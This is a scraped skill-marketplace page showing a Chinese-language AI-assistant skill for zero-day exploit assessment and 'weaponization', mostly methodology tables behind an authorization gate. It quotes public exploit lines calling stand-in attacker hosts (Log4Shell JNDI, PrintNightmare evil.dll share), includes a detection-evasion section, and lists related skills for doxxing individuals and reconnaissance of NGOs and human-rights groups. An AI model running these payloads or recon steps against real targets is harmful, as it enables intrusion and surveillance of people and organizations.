원클릭으로
redteam-intrusion-0day
0day漏洞审查。零日漏洞研究和利用可行性评估。当用户要求"0day分析"、"漏洞利用评估"、"Exploit开发"、"PoC分析"、"漏洞武器化"时使用此技能。仅限授权安全研究使用。
Codex 또는 Claude로 설치 이 Prompt를 복사해 Codex, Claude 또는 다른 어시스턴트에 붙여 넣으면 Skill 페이지를 검토하고 설치를 진행할 수 있습니다.
메뉴
0day漏洞审查。零日漏洞研究和利用可行性评估。当用户要求"0day分析"、"漏洞利用评估"、"Exploit开发"、"PoC分析"、"漏洞武器化"时使用此技能。仅限授权安全研究使用。
Codex 또는 Claude로 설치 이 Prompt를 복사해 Codex, Claude 또는 다른 어시스턴트에 붙여 넣으면 Skill 페이지를 검토하고 설치를 진행할 수 있습니다.
SOC 직업 분류 기준
邮箱情报调查与关联分析。当用户要求"邮箱调查"、"邮箱搜索"、"查邮箱"、"邮箱关联"、"社交账号发现"、"用户名搜索"、"数字足迹"、"OSINT调查"、"人肉搜索"时使用此技能。
企业级目标情报收集。对目标企业进行资产发现、技术栈识别和攻击面测绘。当用户要求"企业资产发现"、"攻击面测绘"、"目标侦察"、"企业情报收集"、"外部资产发现"时使用此技能。
NGO组织攻击面侦察。针对非政府组织的攻击面测绘和社工预研。当用户要求"NGO渗透测试"、"非营利组织侦察"、"人权组织攻击面"、"媒体组织渗透"、"公民社会目标分析"时使用此技能。
个人目标情报收集。针对特定个人的OSINT收集和社工画像分析。当用户要求"人物画像"、"个人情报"、"OSINT调查"、"社工预研"、"VIP安全评估"、"高管风险评估"时使用此技能。
Evaluate access requests and existing privileges with least-privilege policy, segregation-of-duties checks, and approval recommendations.
Identify noisy or redundant alerts and propose safe suppression, deduplication, and threshold tuning with validation criteria.
| name | redteam-intrusion-0day |
| description | 0day漏洞审查。零日漏洞研究和利用可行性评估。当用户要求"0day分析"、"漏洞利用评估"、"Exploit开发"、"PoC分析"、"漏洞武器化"时使用此技能。仅限授权安全研究使用。 |
| metadata | {"version":"1.0.0","builtin":true,"category":"redteam-intrusion"} |
⚠️ RED TEAM AUTHORIZATION REQUIRED
This skill falls under the
redteam:executecapability gate.Before executing ANY step in this skill, you MUST:
- State the skill name and a one-line summary of what you are about to do.
- Ask the user to explicitly confirm authorization by typing "已授权 / AUTHORIZED".
- Ask the user to confirm the authorized scope (target, timeframe, rules of engagement).
- Record the confirmation in your response before proceeding.
Do NOT proceed if:
- The user has not typed the authorization confirmation.
- The target is outside the stated scope.
- Any step would cause irreversible changes without a rollback plan.
Violation of this gate is logged as a
security_alertaudit event.
零日漏洞研究和利用可行性评估,用于红队作战和安全研究。
仅限授权研究:
| 类型 | 代表漏洞 | 利用难度 |
|---|---|---|
| 内存破坏 | 缓冲区溢出、UAF | 高 |
| 逻辑漏洞 | 认证绕过、权限提升 | 中 |
| 注入漏洞 | SQL注入、命令注入 | 低 |
| 反序列化 | Java/PHP反序列化 | 中 |
| 配置缺陷 | 默认凭据、错误配置 | 低 |
| 范围 | 描述 | 价值 |
|---|---|---|
| 通用漏洞 | 影响广泛产品 | 极高 |
| 产品漏洞 | 特定产品 | 高 |
| 配置漏洞 | 特定环境 | 中 |
信息收集:
情报来源:
| 来源 | 类型 | 及时性 |
|---|---|---|
| NVD | 官方 | 中 |
| Exploit-DB | PoC | 快 |
| GitHub | PoC | 快 |
| Twitter/X | 讨论 | 最快 |
| 厂商公告 | 官方 | 中 |
漏洞成因:
## 漏洞分析
### 漏洞类型
[SQL注入 / RCE / 权限绕过等]
### 触发条件
1. [前置条件1]
2. [前置条件2]
### 漏洞代码
[关键代码片段分析]
### 利用链
[触发] → [绕过] → [执行] → [获权]
利用条件评估:
| 条件 | 要求 | 目标环境 |
|---|---|---|
| 版本 | 1.0-2.0 | ✅ 符合 |
| 配置 | 默认配置 | ✅ 符合 |
| 权限 | 无需认证 | ✅ 符合 |
| 网络 | 可达目标端口 | ✅ 符合 |
可利用性评分:
| 维度 | 评分(1-10) | 说明 |
|---|---|---|
| 稳定性 | X | 是否可靠触发 |
| 通用性 | X | 跨版本/环境 |
| 隐蔽性 | X | 日志/痕迹 |
| 复杂度 | X | 利用门槛 |
CVSS评估:
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Changed
Confidentiality: High
Integrity: High
Availability: High
CVSS Score: 9.8 (Critical)
验证环境:
# 搭建测试环境
docker run -d -p 8080:80 vuln-app:1.0
# 执行PoC
python exploit.py -t http://target:8080
# 验证结果
[+] Exploit successful
[+] Shell obtained
PoC来源:
| 来源 | 可靠性 | 风险 |
|---|---|---|
| Exploit-DB | 高 | 低 |
| GitHub | 中 | 中 |
| Metasploit | 高 | 低 |
| 私有 | 不定 | 高 |
定制化需求:
武器化checklist:
Log4Shell (CVE-2021-44228):
${jndi:ldap://attacker.com/exploit}
Spring4Shell (CVE-2022-22965):
POST /path HTTP/1.1
...
class.module.classLoader.resources.context.parent.pipeline...
PrintNightmare (CVE-2021-34527):
# 检测
Get-Service -Name Spooler | Select Status
# 利用
SharpPrintNightmare.exe \\attacker\share\evil.dll
PwnKit (CVE-2021-4034):
# 检测
pkexec --version
# 利用
./pwnkit
# 漏洞评估报告
## 基本信息
| 字段 | 值 |
|------|-----|
| CVE编号 | CVE-XXXX-XXXXX |
| 漏洞名称 | [名称] |
| 影响产品 | [产品版本] |
| 漏洞类型 | [类型] |
| CVSS评分 | X.X |
## 技术分析
[漏洞成因和利用链分析]
## 利用评估
| 维度 | 评估 |
|------|------|
| 可利用性 | 高/中/低 |
| 稳定性 | 高/中/低 |
| 武器化难度 | 高/中/低 |
## 目标适用性
[针对具体目标的评估]
## 利用建议
[红队场景下的使用建议]
## 检测规避
[已知检测方法和规避策略]
| 资源 | 链接 | 用途 |
|---|---|---|
| NVD | nvd.nist.gov | 官方CVE |
| Exploit-DB | exploit-db.com | PoC |
| CVE Details | cvedetails.com | 统计分析 |
| 框架 | 用途 |
|---|---|
| Metasploit | 综合利用 |
| Cobalt Strike | 红队作战 |
| Sliver | 开源C2 |
| 场景 | 调用技能 | 说明 |
|---|---|---|
| 漏洞扫描 | /redteam-intrusion-hunter | 批量发现 |
| 载荷制作 | /redteam-lateral-evasion | 免杀处理 |
| 权限提升 | /redteam-privesc | 后续提权 |
| 漏洞查询 | /researching-vulnerabilities | 情报收集 |